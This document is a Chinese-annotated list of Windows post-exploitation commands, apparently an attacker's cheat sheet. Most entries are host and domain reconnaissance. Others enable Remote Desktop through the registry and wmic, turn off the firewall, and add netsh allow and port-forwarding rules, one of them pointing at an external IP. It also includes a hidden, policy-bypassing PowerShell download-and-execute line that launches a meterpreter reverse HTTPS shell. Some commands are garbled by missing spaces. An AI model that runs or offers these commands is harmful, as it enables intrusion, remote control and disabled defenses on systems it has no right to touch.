- basic
- cd /d d:\tool #cmd切换盘符
- hostname #主机名
- systeminfo #系统信息
- echo %PROCESSOR_ARCHITECTURE% #系统架构
- net statistics workstation #主机开机时间
- schtasks /query /fo LIST /v #查看所有计划任务
- quser #当前在线用户
- net view /domain #查看域
- net config workstation #查看当前计算机名,全名,用户名,系统版本,工作站域,登录的域
- nltest /domain_trusts #域的信任关系
- 注册表相关
- REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f #开启远程桌面
- wmic
- wmic RDTOGGLE WHERE ServerName=’%COMPUTERNAME%’ call SetAllowTSConnections 1 #开启远程桌面
- wmic qfe get Caption,Description,HotFixID,InstalledOn #补丁列表
- wmic useraccount get /all #可以获取到域用户的用户名、描述信息、SID、域名、状态等
- wmic product get name,version #查看当前安装的软件名称和版本
- wmic service list #列出服务
- wmic startup get command,caption #查看启动项
- powershell
- PowerShell.exe -ExecutionPolicy Bypass-WindowStyle Hidden-NoProfile-NonIIEX(New-ObjectNet.WebClient).DownloadString(“http://…/Invoke-Shellcode.ps1”);
Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost ip -Lport port
#从远程服务器下载脚本,绕过执行策略并隐藏窗口执行
- PowerShell.exe -ExecutionPolicy Bypass-WindowStyle Hidden-NoProfile-NonIIEX(New-ObjectNet.WebClient).DownloadString(“http://…/Invoke-Shellcode.ps1”);
- netsh
- netsh firewall show state #防火墙状态
- netsh firewall show config #查看防火墙配置
- netsh firewall set opmode disable #关闭防火墙(windows server 2003及以前)
- netsh advfirewall set allprofiles state off #关闭防火墙(windows server 2003以后)
- netsh firewall add allowedprogram c:\xxx\xx.exe “allow xx” enable #允许指定程序的全部连接(windows server 2003及以前)
- netsh advfirewall firewall add rule name=”pass xx” dir=in action=allow program=”C:\xxx\xx.exe” #允许某个程序连入
- netsh advfirewall firewall add rule name=”pass xx” dir=out action=allow program=”C:\xxx\xx.exe” #允许某个程序外连
- netsh advfirewall firewall add rule name=”Remote Desktop” protocol=TCP dir=in localport=3389 action=allow #开启3389端口,允许该端口入站放行
- Netsh advfirewall firewall delete rule name=zhongzhuan #删除策略
- netsh interface portproxy add v4tov4 listenport=3334 connectaddress=117.50.179.15 connectport=3334